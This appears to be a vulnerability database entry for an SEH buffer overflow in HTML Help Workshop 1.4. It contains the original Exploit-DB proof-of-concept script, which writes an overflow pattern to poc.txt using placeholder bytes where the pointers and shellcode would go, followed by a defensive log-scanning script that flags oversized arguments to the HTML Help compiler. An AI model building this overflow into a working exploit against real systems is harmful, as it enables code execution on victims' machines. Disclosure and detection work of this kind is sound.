Vendor: HTML Help Workshop
By: Moroccan Kingdom (MKD)
CVSS: 9.3 (HIGH)
Vulnerability Type: Buffer Overflow
CWE: 119
Product Name: HTML Help Workshop
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:html_help_workshop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3/SP2 | Windows 7 64/32-bit (eng)
Year: 2014

HTML Help Workshop – (SEH) Buffer Overflow

HTML Help Workshop is prone to a buffer overflow vulnerability when handling specially crafted input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability affects HTML Help Workshop version 1.4.

Mitigation:

Upgrade to the latest version of HTML Help Workshop.

Exploit-DB raw data:

#----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow                                          #
# Date: August 24 2014                                                                               #
# Exploit Author: Moroccan Kingdom (MKD)                                                             #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx  #
# Version: 1.4                                                                                       #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit  (eng)                                         #
#----------------------------------------------------------------------------------------------------#

import subprocess,time
import sys,os

if os.name == "nt" :
   subprocess.call('cls', shell=True)
   os.system("color c")
else :
   subprocess.call('clear', shell=True)

time.sleep(1)

print '''
///////////////////////////////////////////////////////////////////////////////
/                               M.O.R.O.C.C.A.N                               /
/                                K.I.N.G.D.O.M                                /
/                                    [MKD]                                    /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom  /
/ To run this exploit Go to DOS and then go to the folder path program and    /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS...           /
/////////////////////////////////////////////////////////////////////////////// '''

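JNK = "A" * 284                 # filler up to the SEH record
NEH = "B" * 4                   # placeholder over the next-SEH pointer
SEH = "C" * 4                   # placeholder over the SEH handler pointer
SHL = "S" * 400                 # placeholder bytes following the SEH record

POC = JNK + NEH + SEH + SHL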

try :
   # write the pattern to poc.txt in the current directory
   with open("poc.txt", "w") as poc_file:
      poc_file.write(POC)
   print "\n[*] file created successfully"
except IOError:
   print "[#] error to create file"
 
close = raw_input("\n[!] press any button to close()")
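
A detection-side check for the overflow above, as an added example in Python 3 that is not part of the original advisory or PoC: it flags process-creation records where the HTML Help compiler receives a single argument at least as long as the PoC's 284-byte filler. The record keys (`host`, `image`, `command_line`), the sample records and the use of 284 as a threshold are assumptions made for this example.

```python
import ntpath
import re

# Assumption: threshold = the PoC's 284 filler bytes before its SEH placeholders.
MAX_ARG_LEN = 284
# hhc.exe is the HTML Help Workshop compiler; hcc.exe is the PoC banner's spelling.
WATCHED_IMAGES = {"hhc.exe", "hcc.exe"}
TOKEN = re.compile(r'"[^"]*"|\S+')  # a quoted string or a bare word


def longest_repeat_run(text):
    """Length of the longest run of one repeated character, e.g. 'AAAA'."""
    best = run = 0
    prev = None
    for ch in text:
        run = run + 1 if ch == prev else 1
        prev = ch
        best = max(best, run)
    return best


def check_event(event):
    """Return a finding for an oversized argument to a watched image, else None."""
    image = ntpath.basename(event["image"]).lower()
    if image not in WATCHED_IMAGES:
        return None
    args = [t.strip('"') for t in TOKEN.findall(event["command_line"])[1:]]
    worst = max(args, key=len, default="")
    if len(worst) < MAX_ARG_LEN:
        return None
    return {"host": event["host"], "image": image,
            "arg_len": len(worst), "repeat_run": longest_repeat_run(worst)}


def scan(events):
    return [f for f in map(check_event, events) if f]


# Constructed sample records; the key names are hypothetical, not a real log schema.
HHC = r"C:\Program Files\HTML Help Workshop\hhc.exe"
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": HHC, "command_line": '"%s" C:\\docs\\manual.hhp' % HHC},
    {"host": "ws-02", "image": HHC,
     "command_line": "hhc.exe " + "A" * 284 + "B" * 4 + "C" * 4 + "S" * 400},
    {"host": "ws-03", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo " + "x" * 500},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

The `repeat_run` value helps triage: a long run of one character is typical of a test pattern like the one in the PoC, while a long but varied argument deserves a closer look at its content.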